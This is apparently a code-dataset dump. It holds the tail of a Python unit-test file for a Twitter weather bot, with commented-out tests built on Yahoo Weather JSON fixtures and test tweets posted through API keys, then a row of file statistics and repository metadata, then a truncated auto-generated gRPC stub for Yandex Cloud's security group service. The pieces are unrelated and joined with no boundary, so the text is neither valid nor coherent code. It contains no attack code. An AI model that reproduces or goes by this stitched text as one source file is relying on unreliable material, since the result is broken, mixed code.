href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '2', 'text': 'Hurricane'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data3 = weatherBot.get_weather_variables(ydata3)
# self.assertEqual(weatherBot.make_special_tweet(weather_data3), 'HOLY SHIT, THERE\'S A HURRICANE!')
#
# def test_make_special_tweet_wind_condition(self):
# """Testing if wind event is triggered"""
# ydata1 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '23', 'text': 'Blustery'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata1)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1),
# 'Looks like we\'ve got some wind at 9 mph coming from the NW.')
# ydata2 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '24', 'text': 'Windy'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data2 = weatherBot.get_weather_variables(ydata2)
# self.assertEqual(weatherBot.make_special_tweet(weather_data2),
# 'Looks like we\'ve got some wind at 9 km/h coming from the NW.')
#
# def test_make_special_tweet_windchill(self):
# """Testing if windchill event is triggered"""
# ydata_f = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '-22', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-34', 'direction': '15', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata_f)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1),
# 'Wow, mother nature hates us. The windchill is -34' + deg +
# 'F and the wind is blowing at 9 mph from the N. My face hurts.')
# ydata_c = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '-30', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-38', 'direction': '163', 'speed': '42'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data2 = weatherBot.get_weather_variables(ydata_c)
# self.assertEqual(weatherBot.make_special_tweet(weather_data2),
# 'Wow, mother nature hates us. The windchill is -38' + deg +
# 'C and the wind is blowing at 42 km/h from the S. My face hurts.')
#
# def test_make_forecast(self):
# """Testing if forecast contains the conditions, high, and low temperatures"""
# weather_data = weatherBot.get_weather_variables(ydataNorm)
# now = datetime.now().replace(year=2015, month=4, day=2)
# returned = weatherBot.make_forecast(now, weather_data)
# self.assertTrue('partly cloudy/wind' in returned)
# self.assertTrue('23' + deg + 'F' in returned)
# self.assertTrue('59' + deg + 'F' in returned)
#
# def test_make_forecast_error(self):
# """Testing if error condition tweet is returned"""
# weather_data = weatherBot.get_weather_variables(ydataNorm)
# now = datetime.now().replace(year=2015, month=4, day=10)
# returned = weatherBot.make_forecast(now, weather_data)
# self.assertTrue('not available' in returned)
#
# def test_do_tweet(self):
# """Testing tweeting a test tweet using keys from env variables"""
# tweet_location = False
# variable_location = False
# weather_data = {'region': 'MN', 'code': 33, 'humidity': 70, 'units': {'distance': 'mi', 'pressure': 'in', 'speed': 'mph', 'temperature': 'F'}, 'wind_direction': 'NW', 'city': 'Morris', 'latitude': '45.59', 'temp': 43, 'temp_and_unit': '43ºF', 'condition': 'Fair', 'valid': True, 'deg_unit': 'º F', 'longitude': '-95.9', 'windSpeed': 9.0, 'windSpeed_and_unit': '9 mph', 'apparentTemperature': 37}
# content = 'Just running unit tests, this should disappear... %i' % random.randint(0, 1000)
# tweet_content = content + weatherBot.HASHTAG
# status = weatherBot.do_tweet(content, weather_data, tweet_location, variable_location)
# self.assertEqual(status.text, tweet_content)
# # test destroy
# api = weatherBot.get_tweepy_api()
# deleted = api.destroy_status(id=status.id)
# self.assertEqual(deleted.id, status.id)
#
# def test_do_tweet_with_location(self):
# """Testing tweeting a test tweet with location using keys from env variables"""
# tweet_location = True
# variable_location = False
# weather_data = {'region': 'MN', 'code': 33, 'humidity': 70, 'units': {'distance': 'mi', 'pressure': 'in', 'speed': 'mph', 'temperature': 'F'}, 'wind_direction': 'NW', 'city': 'Morris', 'latitude': '45.59', 'temp': 43, 'temp_and_unit': '43ºF', 'condition': 'Fair', 'valid': True, 'deg_unit': 'º F', 'longitude': '-95.9', 'windSpeed': 9.0, 'windSpeed_and_unit': '9 mph', 'apparentTemperature': 37}
# content = 'Just running unit tests, this should disappear... %i' % random.randint(0, 1000)
# tweet_content = content + weatherBot.HASHTAG
# status = weatherBot.do_tweet(content, weather_data, tweet_location, variable_location)
# self.assertEqual(status.text, tweet_content)
# # test destroy
# api = weatherBot.get_tweepy_api()
# deleted = api.destroy_status(id=status.id)
# self.assertEqual(deleted.id, status.id)
#
# def test_do_tweet_with_variable_location(self):
# """Testing tweeting a test tweet using keys from env variables"""
# tweet_location = True
# variable_location = True
# weather_data = {'region': 'MN', 'code': 33, 'humidity': 70, 'units': {'distance': 'mi', 'pressure': 'in', 'speed': 'mph', 'temperature': 'F'}, 'wind_direction': 'NW', 'city': 'Morris', 'latitude': '45.59', 'temp': 43, 'temp_and_unit': '43ºF', 'condition': 'Fair', 'valid': True, 'deg_unit': 'º F', 'longitude': '-95.9', 'windSpeed': 9.0, 'windSpeed_and_unit': '9 mph', 'apparentTemperature': 37}
# content = 'Just running unit tests, this should disappear... %i' % random.randint(0, 1000)
# tweet_content = weather_data['city'] + ", " + weather_data['region'] + ": " + content + weatherBot.HASHTAG
# status = weatherBot.do_tweet(content, weather_data, tweet_location, variable_location)
# self.assertEqual(status.text, tweet_content)
# # test destroy
# api = weatherBot.get_tweepy_api()
# deleted = api.destroy_status(id=status.id)
# self.assertEqual(deleted.id, status.id)
if __name__ == '__main__':
keys.set_twitter_env_vars()
keys.set_forecastio_env_vars()
unittest.main()
| 171.389444 | 2,581 | 0.59983 | 17,072 | 120,144 | 4.153058 | 0.033095 | 0.046882 | 0.046036 | 0.035373 | 0.922695 | 0.910608 | 0.891158 | 0.854092 | 0.843444 | 0.835799 | 0 | 0.071965 | 0.149679 | 120,144 | 700 | 2,582 | 171.634286 | 0.622048 | 0.839676 | 0 | 0.265306 | 0 | 0 | 0.230578 | 0.008344 | 0 | 0 | 0 | 0.001429 | 0.242347 | 1 | 0.030612 | false | 0 | 0.038265 | 0 | 0.076531 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
cfb50f6df39b894326521b105f2ddcc9e81727bc | 17,864 | py | Python | yandex/cloud/vpc/v1/security_group_service_pb2_grpc.py | korsar182/python-sdk | 873bf2a9b136a8f2faae72e86fae1f5b5c3d896a | [
"MIT"
] | 36 | 2018-12-23T13:51:50.000Z | 2022-03-25T07:48:24.000Z | yandex/cloud/vpc/v1/security_group_service_pb2_grpc.py | korsar182/python-sdk | 873bf2a9b136a8f2faae72e86fae1f5b5c3d896a | [
"MIT"
] | 15 | 2019-02-28T04:55:09.000Z | 2022-03-06T23:17:24.000Z | yandex/cloud/vpc/v1/security_group_service_pb2_grpc.py | korsar182/python-sdk | 873bf2a9b136a8f2faae72e86fae1f5b5c3d896a | [
"MIT"
] | 18 | 2019-02-23T07:10:57.000Z | 2022-03-28T14:41:08.000Z | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from yandex.cloud.operation import operation_pb2 as yandex_dot_cloud_dot_operation_dot_operation__pb2
from yandex.cloud.vpc.v1 import security_group_pb2 as yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__pb2
from yandex.cloud.vpc.v1 import security_group_service_pb2 as yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2
class SecurityGroupServiceStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Get = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/Get',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.GetSecurityGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__pb2.SecurityGroup.FromString,
)
self.List = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/List',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupsResponse.FromString,
)
self.Create = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/Create',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.CreateSecurityGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Update = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/Update',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.UpdateRules = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/UpdateRules',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRulesRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.UpdateRule = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/UpdateRule',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRuleRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Delete = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/Delete',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.DeleteSecurityGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Move = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/Move',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.MoveSecurityGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.ListOperations = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/ListOperations',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupOperationsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupOperationsResponse.FromString,
)
class SecurityGroupServiceServicer(object):
"""Missing associated documentation comment in .proto file."""
def Get(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def List(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Create(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Update(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateRules(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateRule(self, request, context):
"""update rule description or labels
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Delete(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Move(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListOperations(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SecurityGroupServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Get': grpc.unary_unary_rpc_method_handler(
servicer.Get,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.GetSecurityGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__pb2.SecurityGroup.SerializeToString,
),
'List': grpc.unary_unary_rpc_method_handler(
servicer.List,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupsResponse.SerializeToString,
),
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.CreateSecurityGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Update': grpc.unary_unary_rpc_method_handler(
servicer.Update,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'UpdateRules': grpc.unary_unary_rpc_method_handler(
servicer.UpdateRules,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRulesRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'UpdateRule': grpc.unary_unary_rpc_method_handler(
servicer.UpdateRule,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRuleRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Delete': grpc.unary_unary_rpc_method_handler(
servicer.Delete,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.DeleteSecurityGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Move': grpc.unary_unary_rpc_method_handler(
servicer.Move,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.MoveSecurityGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'ListOperations': grpc.unary_unary_rpc_method_handler(
servicer.ListOperations,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupOperationsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupOperationsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'yandex.cloud.vpc.v1.SecurityGroupService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class SecurityGroupService(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def Get(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/Get',
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.GetSecurityGroupRequest.SerializeToString,
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__pb2.SecurityGroup.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def List(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/List',
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupsRequest.SerializeToString,
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Create(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/Create',
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.CreateSecurityGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Update(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/Update',
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
